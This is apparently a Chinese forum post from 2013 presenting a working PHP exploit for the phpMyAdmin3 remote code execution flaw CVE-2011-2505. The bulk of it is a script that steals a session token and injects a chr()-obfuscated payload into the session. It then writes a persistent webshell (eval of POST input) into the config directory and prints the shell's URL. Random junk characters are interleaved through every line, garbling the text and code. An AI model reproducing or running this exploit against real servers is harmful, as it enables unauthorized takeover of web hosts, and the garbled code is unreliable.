最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。% H0 k, Z; B" y% [* M1 m
5 k# H2 M: o1 `$ O昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
! i/ ^4 y6 }! K% q% o, _+ i* Z8 M( O/ b
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的: D( s# ]7 v5 x* S
一是session.auto_start = 1;; `& A. v8 k6 s! F# T8 \+ P
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。: t% Q% i- Z( a$ e, g+ t
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。& x Q' v- S( ^; U2 H: T7 U; R9 S
$ |6 i# Q* ^% H3 M
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
. L9 G2 Z9 n& f0 F9 f. T1 G9 q7 |! d o. S( C5 @8 P
于是写了这个php版本的exp,代码如下:( u( l+ I4 l8 X8 C, q2 z
! a# t7 Q! L2 a H/ x0 N
#!/usr/bin/php
" V6 z) t% W4 G( Y( |. t! ?<?php
) [9 V5 t1 o3 v' gprint_r('
& N) J; ^5 D; I; p6 @+---------------------------------------------------------------------------+
$ W1 v+ u+ j6 ]! P \) ^" Bpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)] L5 Z+ G. c9 [2 L8 p
by oldjun(www.oldjun.com)8 p( T# d3 x* n0 Y7 F8 Z1 @0 v
welcome to www.t00ls.net* J }1 A* H4 ]0 d
mail: oldjun@gmail.com! U8 \ b o& {4 R1 e- t6 W5 x9 X$ f
Assigned CVE id: CVE-2011-2505& z: W' z$ d. k+ M1 t
+---------------------------------------------------------------------------+
1 j9 s* O; t- J# ?3 c- I) S. Y');" k& |+ |7 E6 ~6 R( b7 v
0 A5 S$ A% [# |9 |! Y
/**5 n. c' C1 Q4 ?
* working when the directory:"config" exists and is writeable.
p+ g; q+ E3 }**/8 u0 X9 B( R" v- F5 k; o2 T
* c' Q3 ^& @' O! c
if ($argc < 3) {1 g: q# K, u* V& m2 ]; {
print_r('
; Q+ e+ B* j6 J* ~! @( \3 j+---------------------------------------------------------------------------+9 ], \, G% d' A
Usage: php '.$argv[0].' host path
/ f) m/ H2 z' F. j* I8 X! xhost: target server (ip/hostname); P7 K& t9 F8 r$ ?, z2 W
path: path to pma3
; x, T9 P2 e* Z5 n# l: v3 JExample:- |- q$ O D1 [: k0 e
php '.$argv[0].' localhost /pma/" ~0 Y( J3 |' Y! Z/ @; R% J( S
+---------------------------------------------------------------------------+1 q2 F) P7 p9 q# z% q! c
');
2 J$ ]# e. i/ P; Z7 p exit;4 T* z- s9 \& o1 Y: s
}
! i- J5 H$ Q2 y7 B* ^1 |7 A) ?% T) z0 J2 @
$host = $argv[1];) j: k. s- ^$ k; R
$path = $argv[2];& A1 D8 m) ]2 S
$ ^4 f5 _3 R/ `& j# T/**( z6 z8 }* }4 a2 O( q1 w. J
* Try to determine if the directory:"config" exists. R! W K/ x: S
**/* F' k& f; Y" i$ ?. S
echo "[+] Try to determine if the directory:config exists....\n";
( F( u$ {0 O" h3 P- m$returnstr=php_request('config/');& L7 o- S/ b, n
if(strpos($returnstr,'404')){7 W1 V. r G: r4 |
exit("[-] Exploit Failed! The directory:config do not exists!\n");
2 [+ V% |, z0 }/ p}
; T: v- v! X( `5 f+ _8 ^& j! y, s ?4 y+ g ?* _& E
/**
. n2 ~* q: l# C n/ @ * Try to get token and sessionid- |) K( @: U( n9 U/ C u
**/
' |: h+ G$ \3 T( }& S- fecho "[+] Try to get token and sessionid....\n";/ f2 S% h. }) f+ |0 c) e; {2 c
$result=php_request('index.php');8 p1 f& O. i; Q' v! f9 o
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);4 y0 {( }- i$ {! d' Z
$token=$resp[3];+ l6 F0 E$ q( [
$sessionid=$resp[1];
- \$ P, _. w: ?if($token && $sessionid){
6 E( i) {9 r6 [" c" T1 N echo "[+] token token\n";4 z9 @' q( q t$ U0 J# ?
echo "[+] Session IDsessionid\n";0 k% s. M% K) L+ Z3 \* B& n) v
}else{
$ M3 `( h" ^* y3 o; u: l! U exit("[-] Can't get token and Session ID,Exploit Failed!\n");/ l8 A2 v6 u5 H3 ?8 i
}6 a3 e$ e+ b; \& i
7 b' |6 N5 Y- `7 G- _- U/**
. q5 N- `. d9 Y3 `& L( \5 O * Try to insert shell into session D e* F( {& u& g+ Y
**/& H% H( @7 L; V- [, c
echo "[+] Try to insert shell into session....\n";
$ N/ B2 {7 R. l8 M& m! C' ^" q, R4 Z( Q' ?php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.. w2 G" f# v6 L
& y1 w ~. r z2 O! [
/**7 N. p* }% f) t
* Try to create webshell
! M0 W V5 n3 \* t$ J0 q**/9 }* ^$ q7 Q( h" R7 a; |
echo "[+] Try to create webshell....\n";. [( c3 I* O! F+ l7 L( q8 a
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
$ H9 v5 g+ R4 g s/ s: |' x1 z+ r( b/**' Z2 W6 m6 j+ V! K, ?* Z7 g2 \2 x
* Try to check if the webshell was created successfully; P8 ?9 _5 q v) a. t3 F
**/+ y, w1 M* N/ F2 o) y
echo "[+] Try to check if the webshell was created successfully....\n";
0 C9 \. |" J2 [0 a+ D$content=php_request('config/config.inc.php');* u' |9 A( \! k2 f C" q
if(strpos($content,'t00ls')){
/ J) ~: K9 g6 ?# w+ j echo "[+] Congratulations! Expoilt successfully....\n";$ I0 Q$ @( K$ C% U2 _
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";8 b" P6 X& m8 [, r+ m2 w
}else{3 H3 `: t/ u N; y; r
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
: c' B5 ^3 ~" ~5 Y/ F2 J}5 S: i/ Z! {( x8 L: p
' y O$ T. U1 t: d' U6 U8 v1 U
function php_request($url,$data='',$cookie=''){
( ?6 H+ H. l: ^ global $host, $path;5 C7 v2 R7 ^3 \9 c5 T7 m/ D
* P1 {' F4 E/ w8 D" H7 v# e $method=$data?'POST':'GET';% y9 B" \2 Y/ f" A/ g
]% T# {# l8 I, a: y& U% b $packet = $method." ".$path.$url." HTTP/1.1\r\n";
. J! q2 D5 Z- k; p, a $packet .= "Accept: */*\r\n";: [/ ]: K* {: f! v# }0 e
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";' a, L& J1 H: k& q7 G
$packet .= "Host: $host\r\n";
: _* }, u: N" ?& {6 Z $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";" O. y& ]0 _- S- U$ q
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
9 `5 A& P- e$ x$ r, C5 t2 q $packet .= $cookie?"Cookie: $cookie\r\n":"";1 I4 @! ]* z, ^$ ~/ c
$packet .= "Connection: Close\r\n\r\n";( l4 z( e1 |/ ]
$packet .= $data?$data:"";
; l1 m- E% K, U" Z# {4 s3 Y
. V4 ^0 k% d& I9 w" R) } $fp = fsockopen(gethostbyname($host), 80);
% f0 ~/ ~$ H7 O$ x& M! T if (!$fp) {
3 d; u0 |1 L5 x2 M1 }5 W) [! E" a echo 'No response from '.$host; die;2 D: P$ W* M6 f+ {6 `2 C. }
}
- ^9 L( u. ^. _: l$ @ fputs($fp, $packet);% Q( u0 L4 ~$ t6 {! c% s
" K9 u# H/ Z4 J2 N
$resp = '';
0 o% C: Z9 l8 l) |! W7 D& q' I) _% _2 k* y, U6 y- y, e3 W
while ($fp && !feof($fp))
6 r. [) T$ b. g; L( } $resp .= fread($fp, 1024);6 W9 z/ A' D1 ~" {$ G
0 F) _, @' J; ~* c" ?) P return $resp;
3 O: W; w9 a& q0 ^* c}% Y! @, c0 ~1 [* c: U! Q! [! a) G
" Q1 s) F5 I% [* m: W9 f, K3 ^
?> 2 u, c) r' D$ c- C# w
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对